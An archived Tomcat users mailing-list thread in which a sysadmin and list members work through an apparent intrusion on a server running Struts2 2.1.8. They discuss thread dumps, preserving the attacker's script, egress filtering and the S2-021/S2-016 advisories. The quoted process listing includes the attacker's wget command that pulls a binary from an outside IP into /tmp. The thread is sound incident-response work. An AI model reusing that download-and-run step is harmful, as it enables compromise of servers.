-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iQIcBAEBCAAGBQJTZ6bFAAoJEBzwKT+lPKRY57YP/3sstUfEdBSUTlNpzipRUN+i
YnVNnO9lb6Ax1Ab2+I0c8crUx/rEWFFqG3m0mmsfBzYvny0r34kQ0PKfS/QSjZxd
zQ5ft+1kRoOvWsdq8m9c+oPrh3i2OhLMDxGhnmnZT5NQu54dTOBdLKOhFb4z0WyZ
q4G2RCPSlGD5v1m20MXMoMbkmHFagrgYUHzZSmrlcXwaj+TNgOzLdpxvfr7v4z0o
TjACc6H9If3YY+/qHE4E0KFnpZGxuHynL62BDnTenpiP8aQ+dijVxUeom9cprLIU
8M6eDLIDtopaLYxLPAvpxNuzB7HIam0Ib+5Yq4c12N1lUFEw0EKVoFbYGu08yyEz
6RHH2VCToUJtC2R5WYC/cBS86y5Ni5pwgHmaA1QeaqgKC8zbH0pRVxu/Q9NUm0vP
9E1d4m2b6p77z7lmEEA+c/hXfeR9n72btc+iQklPzDrPXBUXQnGNwo3s8VFA7e/k
z4VrcURWl/dvWLTAWE3A4kv21R+3ZhCKewfN3x8ItF57Kq6YaTJJ2y8EH133zIxt
klyG/1SE6TP9hAKFGQs3pQE+oAHZHMbJMlM/2cLwZXfFu2hPDBkrnk56YLC6SSSK
a8Fgdwdo81CkhxGxd5aaFOfHqru9hFZIHsVqHmhFL5hJ6H84a7cL/prOPHu7k2rz
/V2lPhNpr08bYy+s2pkN
=4tjy
-----END PGP SIGNATURE-----
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Well thread dump is here
https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing
Let me know if im missing something.
thanks !
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-05-05 9:34 GMT-03:00 Leonardo Santagostini <ls...@gmail.com>:
> Hello all, sorry for the late, but i was in holiday from wednesday.
>
> Ok, i make a ticket to developers for upgrading strus. They told me that
> will work on that.
>
> So, i will keep in touch with the news =)
>
> Again, thanks all for all the support you give me.
>
> Regards,
> Leonardo
>
> Saludos.-
> Leonardo Santagostini
>
> <http://ar.linkedin.com/in/santagostini>
>
>
>
>
>
> 2014-05-01 18:48 GMT-03:00 Christopher Schultz <
> chris@christopherschultz.net>:
>
> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA256
>>
>> Cédric,
>>
>> On 5/1/14, 10:00 AM, Cédric Couralet wrote:
>> > 2014-04-30 19:07 GMT+02:00 Christopher Schultz
>> > <chris@christopherschultz.net
>> >> :
>> >
>> > Leonardo,
>> >
>> > On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
>> >>>> Im uploading mi logfiles so it will be available when
>> >>>> finished uploading.
>> >
>> > Remember to get a thread dump while Runtime.exec() is running.
>> >
>> > You should copy the script /tmp/4.sh somewhere else so you have a
>> > copy in case the attacker tries to clean-up after themselves.
>> > That's certainly what's doing the evil work.
>> >
>> > You could probably set up iptables or something to restrict
>> > outgoing requests so that the attack can't progress across your
>> > network.
>> >
>> >>>> Regarding the configuration, its working in two other sites
>> >>>> without problem, and there is no problem putting L4 balancing
>> >>>> with haproxy.
>> >>>>
>> >>>> I have asked developers about that exploit, still without
>> >>>> answer.
>> >
>> > You appear to be using struts2 2.1.8, which is in the range of
>> > versions vulnerable to this bug. There is a workaround that you
>> > can probably apply:
>> > http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the
>> > last section on this page).
>> >
>> >> Of course, the vulnerability doesn't allow you to simply inject
>> >> code
>> > or anything like that: you can certainly mess-around with code that
>> > is already available on the site, though.
>> >
>> >
>> >> I think the S2-021 can be used to inject code. There is a POC
>> >> circulating proving it. That said, this struts version (2.1.8) is
>> >> also vulnerable to
>> >> http://struts.apache.org/release/2.3.x/docs/s2-016.html which
>> >> permits code execution very easily.
>>
>> Ouch. Yeah, there's always that ;)
>>
>> - -chris
>> -----BEGIN PGP SIGNATURE-----
>> Version: GnuPG v1
>> Comment: GPGTools - http://gpgtools.org
>> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>>
>> iQIcBAEBCAAGBQJTYsE7AAoJEBzwKT+lPKRYwqUP/1E6TUIJq618bPN0KzzvQbC4
>> Hny9racWUoNKFayWa9Xz/uWbQvXADyPnjO9q1BhcZW4TMyBTTksSUo33JAy567Sn
>> tspV1ldMdOcL+y7KQUNJb9VJI9CV5h2nkeoaZacm8qmg9fZUqTihhz+qRC/U9JMa
>> iJGKlLYIjvzPFrTXsoFnGl9yT54JAXvDf8aJPiSimD1Mu78KXCRhhterIH5QscI1
>> qstciSIllaSeq6EccM7b9hH4tEEXT/PwjiEoV1zSzxP01XT1qPnxtyRtNhWxer2p
>> MDzDEimTNVshy9ilXa3MTBZh9hLcp3uEsUqmgSQyLAeLEKEEqQcsOkpQHfn9JOQQ
>> ZXJVvhM1PuM4YsMoRcenu5Otdc5AUPh31b614Mc1NBtFRj/DVARWCU1u0Rb+mTTW
>> HsNeRhmTfGp09x2NCokW2ncMV+coytjUwbfPGZ2yQAIZCC8k9EAxI942cKzsBVdU
>> J7Ch3J9EEy0WxEiX8zDrHjNWWwmRBf0BexEQqnnCgQCMWAoVjRcPo75LChY60uDP
>> vvB5Z/iGtbfFSwKEPVvYJhDzMJm3tlxVVdhmT+nejig6S4vdhAY/yDIxnNUm7waE
>> IEJ7xtN5Ev3XLxT1fR34kw3n+0aRXiWyZzMTr2gTyf6C/Y9moz0wPyliBz0qKh67
>> hEEF98sa1D+pfJC5FGdj
>> =ZJPK
>> -----END PGP SIGNATURE-----
>>
>> ---------------------------------------------------------------------
>> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
>> For additional commands, e-mail: users-help@tomcat.apache.org
>>
>>
>
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello all, sorry for the late, but i was in holiday from wednesday.
Ok, i make a ticket to developers for upgrading strus. They told me that
will work on that.
So, i will keep in touch with the news =)
Again, thanks all for all the support you give me.
Regards,
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-05-01 18:48 GMT-03:00 Christopher Schultz <chris@christopherschultz.net
>:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
>
> Cédric,
>
> On 5/1/14, 10:00 AM, Cédric Couralet wrote:
> > 2014-04-30 19:07 GMT+02:00 Christopher Schultz
> > <chris@christopherschultz.net
> >> :
> >
> > Leonardo,
> >
> > On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
> >>>> Im uploading mi logfiles so it will be available when
> >>>> finished uploading.
> >
> > Remember to get a thread dump while Runtime.exec() is running.
> >
> > You should copy the script /tmp/4.sh somewhere else so you have a
> > copy in case the attacker tries to clean-up after themselves.
> > That's certainly what's doing the evil work.
> >
> > You could probably set up iptables or something to restrict
> > outgoing requests so that the attack can't progress across your
> > network.
> >
> >>>> Regarding the configuration, its working in two other sites
> >>>> without problem, and there is no problem putting L4 balancing
> >>>> with haproxy.
> >>>>
> >>>> I have asked developers about that exploit, still without
> >>>> answer.
> >
> > You appear to be using struts2 2.1.8, which is in the range of
> > versions vulnerable to this bug. There is a workaround that you
> > can probably apply:
> > http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the
> > last section on this page).
> >
> >> Of course, the vulnerability doesn't allow you to simply inject
> >> code
> > or anything like that: you can certainly mess-around with code that
> > is already available on the site, though.
> >
> >
> >> I think the S2-021 can be used to inject code. There is a POC
> >> circulating proving it. That said, this struts version (2.1.8) is
> >> also vulnerable to
> >> http://struts.apache.org/release/2.3.x/docs/s2-016.html which
> >> permits code execution very easily.
>
> Ouch. Yeah, there's always that ;)
>
> - -chris
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1
> Comment: GPGTools - http://gpgtools.org
> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>
> iQIcBAEBCAAGBQJTYsE7AAoJEBzwKT+lPKRYwqUP/1E6TUIJq618bPN0KzzvQbC4
> Hny9racWUoNKFayWa9Xz/uWbQvXADyPnjO9q1BhcZW4TMyBTTksSUo33JAy567Sn
> tspV1ldMdOcL+y7KQUNJb9VJI9CV5h2nkeoaZacm8qmg9fZUqTihhz+qRC/U9JMa
> iJGKlLYIjvzPFrTXsoFnGl9yT54JAXvDf8aJPiSimD1Mu78KXCRhhterIH5QscI1
> qstciSIllaSeq6EccM7b9hH4tEEXT/PwjiEoV1zSzxP01XT1qPnxtyRtNhWxer2p
> MDzDEimTNVshy9ilXa3MTBZh9hLcp3uEsUqmgSQyLAeLEKEEqQcsOkpQHfn9JOQQ
> ZXJVvhM1PuM4YsMoRcenu5Otdc5AUPh31b614Mc1NBtFRj/DVARWCU1u0Rb+mTTW
> HsNeRhmTfGp09x2NCokW2ncMV+coytjUwbfPGZ2yQAIZCC8k9EAxI942cKzsBVdU
> J7Ch3J9EEy0WxEiX8zDrHjNWWwmRBf0BexEQqnnCgQCMWAoVjRcPo75LChY60uDP
> vvB5Z/iGtbfFSwKEPVvYJhDzMJm3tlxVVdhmT+nejig6S4vdhAY/yDIxnNUm7waE
> IEJ7xtN5Ev3XLxT1fR34kw3n+0aRXiWyZzMTr2gTyf6C/Y9moz0wPyliBz0qKh67
> hEEF98sa1D+pfJC5FGdj
> =ZJPK
> -----END PGP SIGNATURE-----
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> For additional commands, e-mail: users-help@tomcat.apache.org
>
>
Re: Regarding i think an intrusion
Posted by Christopher Schultz <ch...@christopherschultz.net>.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Cédric,
On 5/1/14, 10:00 AM, Cédric Couralet wrote:
> 2014-04-30 19:07 GMT+02:00 Christopher Schultz
> <chris@christopherschultz.net
>> :
>
> Leonardo,
>
> On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
>>>> Im uploading mi logfiles so it will be available when
>>>> finished uploading.
>
> Remember to get a thread dump while Runtime.exec() is running.
>
> You should copy the script /tmp/4.sh somewhere else so you have a
> copy in case the attacker tries to clean-up after themselves.
> That's certainly what's doing the evil work.
>
> You could probably set up iptables or something to restrict
> outgoing requests so that the attack can't progress across your
> network.
>
>>>> Regarding the configuration, its working in two other sites
>>>> without problem, and there is no problem putting L4 balancing
>>>> with haproxy.
>>>>
>>>> I have asked developers about that exploit, still without
>>>> answer.
>
> You appear to be using struts2 2.1.8, which is in the range of
> versions vulnerable to this bug. There is a workaround that you
> can probably apply:
> http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the
> last section on this page).
>
>> Of course, the vulnerability doesn't allow you to simply inject
>> code
> or anything like that: you can certainly mess-around with code that
> is already available on the site, though.
>
>
>> I think the S2-021 can be used to inject code. There is a POC
>> circulating proving it. That said, this struts version (2.1.8) is
>> also vulnerable to
>> http://struts.apache.org/release/2.3.x/docs/s2-016.html which
>> permits code execution very easily.
Ouch. Yeah, there's always that ;)
- -chris
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iQIcBAEBCAAGBQJTYsE7AAoJEBzwKT+lPKRYwqUP/1E6TUIJq618bPN0KzzvQbC4
Hny9racWUoNKFayWa9Xz/uWbQvXADyPnjO9q1BhcZW4TMyBTTksSUo33JAy567Sn
tspV1ldMdOcL+y7KQUNJb9VJI9CV5h2nkeoaZacm8qmg9fZUqTihhz+qRC/U9JMa
iJGKlLYIjvzPFrTXsoFnGl9yT54JAXvDf8aJPiSimD1Mu78KXCRhhterIH5QscI1
qstciSIllaSeq6EccM7b9hH4tEEXT/PwjiEoV1zSzxP01XT1qPnxtyRtNhWxer2p
MDzDEimTNVshy9ilXa3MTBZh9hLcp3uEsUqmgSQyLAeLEKEEqQcsOkpQHfn9JOQQ
ZXJVvhM1PuM4YsMoRcenu5Otdc5AUPh31b614Mc1NBtFRj/DVARWCU1u0Rb+mTTW
HsNeRhmTfGp09x2NCokW2ncMV+coytjUwbfPGZ2yQAIZCC8k9EAxI942cKzsBVdU
J7Ch3J9EEy0WxEiX8zDrHjNWWwmRBf0BexEQqnnCgQCMWAoVjRcPo75LChY60uDP
vvB5Z/iGtbfFSwKEPVvYJhDzMJm3tlxVVdhmT+nejig6S4vdhAY/yDIxnNUm7waE
IEJ7xtN5Ev3XLxT1fR34kw3n+0aRXiWyZzMTr2gTyf6C/Y9moz0wPyliBz0qKh67
hEEF98sa1D+pfJC5FGdj
=ZJPK
-----END PGP SIGNATURE-----
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org
Re: Regarding i think an intrusion
Posted by Cédric Couralet <ce...@gmail.com>.
2014-04-30 19:07 GMT+02:00 Christopher Schultz <chris@christopherschultz.net
>:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
>
> Leonardo,
>
> On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
> > Im uploading mi logfiles so it will be available when finished
> > uploading.
>
> Remember to get a thread dump while Runtime.exec() is running.
>
> You should copy the script /tmp/4.sh somewhere else so you have a copy
> in case the attacker tries to clean-up after themselves. That's
> certainly what's doing the evil work.
>
> You could probably set up iptables or something to restrict outgoing
> requests so that the attack can't progress across your network.
>
> > Regarding the configuration, its working in two other sites
> > without problem, and there is no problem putting L4 balancing with
> > haproxy.
> >
> > I have asked developers about that exploit, still without answer.
>
> You appear to be using struts2 2.1.8, which is in the range of
> versions vulnerable to this bug. There is a workaround that you can
> probably apply:
> http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last
> section on this page).
Of course, the vulnerability doesn't allow you to simply inject code
> or anything like that: you can certainly mess-around with code that is
> already available on the site, though.
>
>
I think the S2-021 can be used to inject code. There is a POC circulating
proving it.
That said, this struts version (2.1.8) is also vulnerable to
http://struts.apache.org/release/2.3.x/docs/s2-016.html which permits code
execution very easily.
> - -chris
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1
> Comment: GPGTools - http://gpgtools.org
> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>
> iQIcBAEBCAAGBQJTYS3BAAoJEBzwKT+lPKRYqDsP/jmNjM+YwxySFGgPUuvcL2bN
> kkApblcr9ryGZQG6RGwUFr69FCJ8qFDQSZ0aXXxPCfTpM6ce1VqXPv+WcOwnueOF
> mrugSa2InF2IWPAP2lwhEGqyxRAYZGfxz0aA9sFb7sSw4IpDP7u6TJx9g3oYrLTt
> URIbzTfhY0aGgEkQlrWNgrAWFKsUQ0uOrg8+3IS52O/e1ZVdudTMQBh5/LLJ522p
> yr+TlMooKDY8OA1TYttE0zEe3/Z9dd2AZ4YHoqLy8Hwq0lufYSaFZ5TpHfiOgJ0I
> 0Q3dcXEmjMTrBkBm4JKBR9b6KZSvG/H42q0GsEFHZeGw+3VIqYFGVRR5iCRRvVgg
> cqVKgGevB+fefcbGX9IFgFnus8QMUYq4XOcsE1YJVflxVBEfgwsCDLZEJqpzbovV
> ZpNBimPoLc8I5ifo2o7GSkO1GNSjhD7Q9p5MnmNW7Qna9RJh67Lv2oft9yPqGvjZ
> F2dTgbKFqyr8GSy/X4Ji8FsoeK+YxF0zXXDkaXxJzu054LuhodLCHJu7WwnwGjjL
> 0VI/Xxfihzk9+u3HNuwK0HTEt40Tca+vEKDUlMa9fvHL3ZqM3upy50bGE0PCTrJO
> A1cI+e0lzKEEQ+maym65DmSYiVvUPnfv0AxA0iUfU/UbhV1yWEkD3TyF3dOZPZqH
> ob6Km1Clt4KNLKVyQjt+
> =8KFm
> -----END PGP SIGNATURE-----
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> For additional commands, e-mail: users-help@tomcat.apache.org
>
>
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello Christopher, thanks for your response.
I have a copy of 4.sh and squid (binary ELF file) and tried to see using
strings what this program do. I couldn’t see anything =(
Im monitoring the server for getting a dump at the moment this injection
occurs.
Files still uploanding =(
Thanks for all, kind regards
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-04-30 14:07 GMT-03:00 Christopher Schultz <chris@christopherschultz.net
>:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
>
> Leonardo,
>
> On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
> > Im uploading mi logfiles so it will be available when finished
> > uploading.
>
> Remember to get a thread dump while Runtime.exec() is running.
>
> You should copy the script /tmp/4.sh somewhere else so you have a copy
> in case the attacker tries to clean-up after themselves. That's
> certainly what's doing the evil work.
>
> You could probably set up iptables or something to restrict outgoing
> requests so that the attack can't progress across your network.
>
> > Regarding the configuration, its working in two other sites
> > without problem, and there is no problem putting L4 balancing with
> > haproxy.
> >
> > I have asked developers about that exploit, still without answer.
>
> You appear to be using struts2 2.1.8, which is in the range of
> versions vulnerable to this bug. There is a workaround that you can
> probably apply:
> http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last
> section on this page).
>
> Of course, the vulnerability doesn't allow you to simply inject code
> or anything like that: you can certainly mess-around with code that is
> already available on the site, though.
>
> - -chris
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1
> Comment: GPGTools - http://gpgtools.org
> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>
> iQIcBAEBCAAGBQJTYS3BAAoJEBzwKT+lPKRYqDsP/jmNjM+YwxySFGgPUuvcL2bN
> kkApblcr9ryGZQG6RGwUFr69FCJ8qFDQSZ0aXXxPCfTpM6ce1VqXPv+WcOwnueOF
> mrugSa2InF2IWPAP2lwhEGqyxRAYZGfxz0aA9sFb7sSw4IpDP7u6TJx9g3oYrLTt
> URIbzTfhY0aGgEkQlrWNgrAWFKsUQ0uOrg8+3IS52O/e1ZVdudTMQBh5/LLJ522p
> yr+TlMooKDY8OA1TYttE0zEe3/Z9dd2AZ4YHoqLy8Hwq0lufYSaFZ5TpHfiOgJ0I
> 0Q3dcXEmjMTrBkBm4JKBR9b6KZSvG/H42q0GsEFHZeGw+3VIqYFGVRR5iCRRvVgg
> cqVKgGevB+fefcbGX9IFgFnus8QMUYq4XOcsE1YJVflxVBEfgwsCDLZEJqpzbovV
> ZpNBimPoLc8I5ifo2o7GSkO1GNSjhD7Q9p5MnmNW7Qna9RJh67Lv2oft9yPqGvjZ
> F2dTgbKFqyr8GSy/X4Ji8FsoeK+YxF0zXXDkaXxJzu054LuhodLCHJu7WwnwGjjL
> 0VI/Xxfihzk9+u3HNuwK0HTEt40Tca+vEKDUlMa9fvHL3ZqM3upy50bGE0PCTrJO
> A1cI+e0lzKEEQ+maym65DmSYiVvUPnfv0AxA0iUfU/UbhV1yWEkD3TyF3dOZPZqH
> ob6Km1Clt4KNLKVyQjt+
> =8KFm
> -----END PGP SIGNATURE-----
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> For additional commands, e-mail: users-help@tomcat.apache.org
>
>
Re: Regarding i think an intrusion
Posted by Christopher Schultz <ch...@christopherschultz.net>.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Leonardo,
On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
> Im uploading mi logfiles so it will be available when finished
> uploading.
Remember to get a thread dump while Runtime.exec() is running.
You should copy the script /tmp/4.sh somewhere else so you have a copy
in case the attacker tries to clean-up after themselves. That's
certainly what's doing the evil work.
You could probably set up iptables or something to restrict outgoing
requests so that the attack can't progress across your network.
> Regarding the configuration, its working in two other sites
> without problem, and there is no problem putting L4 balancing with
> haproxy.
>
> I have asked developers about that exploit, still without answer.
You appear to be using struts2 2.1.8, which is in the range of
versions vulnerable to this bug. There is a workaround that you can
probably apply:
http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last
section on this page).
Of course, the vulnerability doesn't allow you to simply inject code
or anything like that: you can certainly mess-around with code that is
already available on the site, though.
- -chris
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iQIcBAEBCAAGBQJTYS3BAAoJEBzwKT+lPKRYqDsP/jmNjM+YwxySFGgPUuvcL2bN
kkApblcr9ryGZQG6RGwUFr69FCJ8qFDQSZ0aXXxPCfTpM6ce1VqXPv+WcOwnueOF
mrugSa2InF2IWPAP2lwhEGqyxRAYZGfxz0aA9sFb7sSw4IpDP7u6TJx9g3oYrLTt
URIbzTfhY0aGgEkQlrWNgrAWFKsUQ0uOrg8+3IS52O/e1ZVdudTMQBh5/LLJ522p
yr+TlMooKDY8OA1TYttE0zEe3/Z9dd2AZ4YHoqLy8Hwq0lufYSaFZ5TpHfiOgJ0I
0Q3dcXEmjMTrBkBm4JKBR9b6KZSvG/H42q0GsEFHZeGw+3VIqYFGVRR5iCRRvVgg
cqVKgGevB+fefcbGX9IFgFnus8QMUYq4XOcsE1YJVflxVBEfgwsCDLZEJqpzbovV
ZpNBimPoLc8I5ifo2o7GSkO1GNSjhD7Q9p5MnmNW7Qna9RJh67Lv2oft9yPqGvjZ
F2dTgbKFqyr8GSy/X4Ji8FsoeK+YxF0zXXDkaXxJzu054LuhodLCHJu7WwnwGjjL
0VI/Xxfihzk9+u3HNuwK0HTEt40Tca+vEKDUlMa9fvHL3ZqM3upy50bGE0PCTrJO
A1cI+e0lzKEEQ+maym65DmSYiVvUPnfv0AxA0iUfU/UbhV1yWEkD3TyF3dOZPZqH
ob6Km1Clt4KNLKVyQjt+
=8KFm
-----END PGP SIGNATURE-----
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello Martin/Felix,
Im uploading mi logfiles so it will be available when finished uploading.
Regarding the configuration, its working in two other sites without
problem, and there is no problem putting L4 balancing with haproxy.
I have asked developers about that exploit, still without answer.
I will let you know how things are going, thanks for all =)
Regards/Saludos!
BTW: Martin, thanks for your spanish words !!!! Really appreciate =)
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-04-30 13:20 GMT-03:00 Felix Schumacher <
felix.schumacher@internetallee.de>:
>
>
> On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini <
> lsantagostini@gmail.com> wrote:
> >Hello list,
> >
> >well my homework is done
> >
> >Here are the links:
> >
> >setenv.sh: http://pastebin.com/EN1mXDFi
> >catalina.sh: http://pastebin.com/1vRVLbSm
> >web.xml: http://pastebin.com/BqEfiXXm
> >server.xml: http://pastebin.com/wfzE8bYU
> >logging.properties: http://pastebin.com/Qurk8sLU
> >catalina.properties: http://pastebin.com/jkfY1ZRQ
> >tree + logsfiles: http://pastebin.com/j3tip4ij
>
> From the logfiles it looks like you have struts2 applications. It might be
> that you are hit by a security problem within struts2 ( Konstantin
> forwarded a warning a few days ago
> http://tomcat.10.x6.nabble.com/Fwd-ANN-Struts-2-up-to-2-3-16-1-Zero-Day-Exploit-Mitigation-security-critical-td5016578.html).
>
> >
> >Note that logsfiles, are not the logfiles itsef but only a ls -lah
> >(just
> >for you to see the logsizes)
> >
> >A little more about the infraestructure i've mounted ill do some ascii
> >art.
> >
> >
> >internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk
> >(3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)
>
> That seems a bit too complex. In my eyes you need no haproxy between httpd
> and tomcat when you use mod_jk.
>
> Regards
> Felix
> >
> >
> >Apache(2) is serving static content so haproxy(1) at the first level
> >does
> >http round robin balancing
> >Apache(2) connects to tomcat(5) through haproxy(4) (using L4
> >connection)
> >using mod_jk(3)
> >Tomcat(5) are the main app server (the ones gets intruded) who uses
> >tomcat(7) (solr service) using haproxy(6) using L4 connection.
> >
> >Versions:
> >
> >Apache: 2.2.17
> >mod_jk: 1.2.31
> >haproxy: 1.4.22
> >Tomcat: 7.0.53
> >Java: 1.6.0.41
> >
> >[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
> >java version "1.6.0_41"
> >Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
> >Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
> >
> >OS: CentOS 5.8 64 bit
> >
> >[root@arcbaappvrt05 tomcat]# uname -a
> >Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb
> >21
> >20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
> >[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
> >CentOS release 5.8 (Final)
> >[root@arcbaappvrt05 tomcat]#
> >
> >For now i havent see that the squid process whas launched so i couldnt
> >do a
> >dump
> >
> >Letme know if you need more information.
> >
> >BTW, pastebin links will work for one week.
> >
> >Kind regards, yours
> >
> >
> >
> >
> >Saludos.-
> >Leonardo Santagostini
> >
> ><http://ar.linkedin.com/in/santagostini>
> >
> >
> >
> >
> >
> >2014-04-30 11:09 GMT-03:00 Leonardo Santagostini
> ><ls...@gmail.com>:
> >
> >> Ok, i will do the following:
> >>
> >> 1) thread dump of running tomcat instance
> >> 2) Pastebin the running tomcat config
> >>
> >> I think at mid day will have all the info.
> >>
> >> Thanks all for replying me and all the responses.
> >>
> >> Regards, Leonardo
> >>
> >> Saludos.-
> >> Leonardo Santagostini
> >>
> >> <http://ar.linkedin.com/in/santagostini>
> >>
> >>
> >>
> >>
> >>
> >> 2014-04-30 10:55 GMT-03:00 Christopher Schultz <
> >> chris@christopherschultz.net>:
> >>
> >> -----BEGIN PGP SIGNED MESSAGE-----
> >>> Hash: SHA256
> >>>
> >>> Konstantin,
> >>>
> >>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> >>> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
> >>> > <ls...@gmail.com>:
> >>> >> Hello Dan,
> >>> >>
> >>> >> Nop, the attacker is executing locally the following
> >>> >>
> >>> >> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh
> >>> >> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget
> >>> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
> >>> >>
> >>> >> And the launch squid who tries to connect via ssh to varoius
> >>> >> places.
> >>> >>
> >>> >> Right now its time to leave the office, but in a few hours i will
> >>> >> paste in pastebin access logs, config files, wherever you tell
> >>> >> me.
> >>> >>
> >>> >> This is my pstree
> >>> >>
> >>> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
> >>> >> ├─java─┬─sh───wget │ └─263*[{java}]
> >>> >
> >>> > sh launched by tomcat's java?
> >>>
> >>> Yes: please verify that it's the JVM running Tomcat, and not just
> >any
> >>> JVM process.
> >>>
> >>> > Take a thread dump:
> >>> >
> >>>
> >
> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
> >>> >
> >>> > It shall show what is stacktrace in thread that launched external
> >>> > process.
> >>>
> >>> +1
> >>>
> >>> The only things that ship with Tomcat that call Process.exec() are
> >the
> >>> CGI servlet and SSI, both of which are disabled by default. So,
> >either
> >>> you have an insecure CGI/SSI configuration, your web application has
> >a
> >>> vulnerability, or you have deployed something like the Manager
> >>> application and improperly-secured it.
> >>>
> >>> A classic example of such an intrusion might be that someone got a
> >>> foothold elsewhere into your network, and the Manager web
> >application
> >>> is not properly secured with a password, etc.
> >>>
> >>> - -chris
> >>> -----BEGIN PGP SIGNATURE-----
> >>> Version: GnuPG v1
> >>> Comment: GPGTools - http://gpgtools.org
> >>> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
> >>>
> >>> iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
> >>> +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
> >>> HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
> >>> D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
> >>> gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
> >>> BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS
> >>> ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj
> >>> UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb
> >>> TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W
> >>> WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7
> >>> 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12
> >>> lvJcfOhzHLwo07Pv+y3J
> >>> =EiX9
> >>> -----END PGP SIGNATURE-----
> >>>
> >>>
> >---------------------------------------------------------------------
